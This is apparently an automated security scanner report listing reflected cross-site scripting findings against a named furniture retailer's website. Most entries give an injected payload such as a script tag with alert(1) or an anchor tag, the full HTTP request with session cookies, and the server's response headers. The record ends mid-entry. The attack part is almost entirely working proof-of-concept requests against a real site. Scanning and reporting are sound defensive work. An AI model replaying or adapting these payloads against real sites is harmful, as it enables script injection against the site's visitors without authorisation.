The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0de7<a>588021ee9a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cart.phpf0de7<a>588021ee9a7/1' HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:58 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21a6d<a>696843c7ff6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cart.php/1'21a6d<a>696843c7ff6 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:29 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffc67"><script>alert(1)</script>7677760fccf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.php/1'ffc67"><script>alert(1)</script>7677760fccf HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:27 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11982
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1b20"><script>alert(1)</script>2193666e451 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /church-furniture.htmlc1b20"><script>alert(1)</script>2193666e451 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/cart.php Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; cartId=31f312284fec0a02f7a8e5e805e7d277; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.15.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12002
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 287f2<a>6d0fd0479bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /church-furniture.html287f2<a>6d0fd0479bd HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/cart.php Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; cartId=31f312284fec0a02f7a8e5e805e7d277; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.15.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11954
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cabf0"><script>alert(1)</script>4a2a3d4ad2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 622b0<a>72d0ba4ff3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d918"><script>alert(1)</script>6766ec5650a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c23a5<a>683866ed79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9ce4<a>ddb5eb40b1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/jqModalDef.cssb9ce4<a>ddb5eb40b1d?v=1.0 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:33:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/ Vary: User-Agent Content-Length: 11948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f042"><script>alert(1)</script>b8a07902a78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/jqModalDef.css1f042"><script>alert(1)</script>b8a07902a78?v=1.0 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:02:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/ Vary: User-Agent Content-Length: 11996
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7acf7"><script>alert(1)</script>1527c3eba87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1f7b6<a>ab28509deab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55efd"><script>alert(1)</script>6050ea0498 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/modelpage.css55efd"><script>alert(1)</script>6050ea0498?v=1.1 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:02:30 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/ Vary: User-Agent Content-Length: 11992
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd2f9<a>e80f7c98aa8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /css/modelpage.cssbd2f9<a>e80f7c98aa8?v=1.1 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:33:15 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384118649ca5f79dcac; path=/ Vary: User-Agent Content-Length: 11946
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6097f"><script>alert(1)</script>416f2a5bc14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 911f8<a>f98a4ba5f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7796c<a>4ced324bcc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /favicon.ico7796c<a>4ced324bcc4?v=1.0 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.1.10.1317384676; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:30:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; path=/ Vary: User-Agent Content-Length: 11934
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61d2e"><script>alert(1)</script>2a3a66be71b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico61d2e"><script>alert(1)</script>2a3a66be71b?v=1.0 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.1.10.1317384676; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 11:59:30 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; path=/ Vary: User-Agent Content-Length: 11982
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0ee3<a>6921f3b3855 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45bfc"><script>alert(1)</script>15377040f0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9711a"><script>alert(1)</script>384ea5f7ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search-complete.php9711a"><script>alert(1)</script>384ea5f7ffe?q=xss+&limit=10×tamp=1317384695442 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.hertzfurniture.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=dbea8e4a771c4c48955cb1cc99feb873; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|Referrer information not available|Raw Query not available; WRUID=410325474.977200202; IPE35522=IPE35522; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.4.9.1317384693463; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:32:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=ra1kqbcn3svcs5uh2khg9rlmq5; path=/ Vary: User-Agent Content-Length: 11998
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc169<a>6387d5e35e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
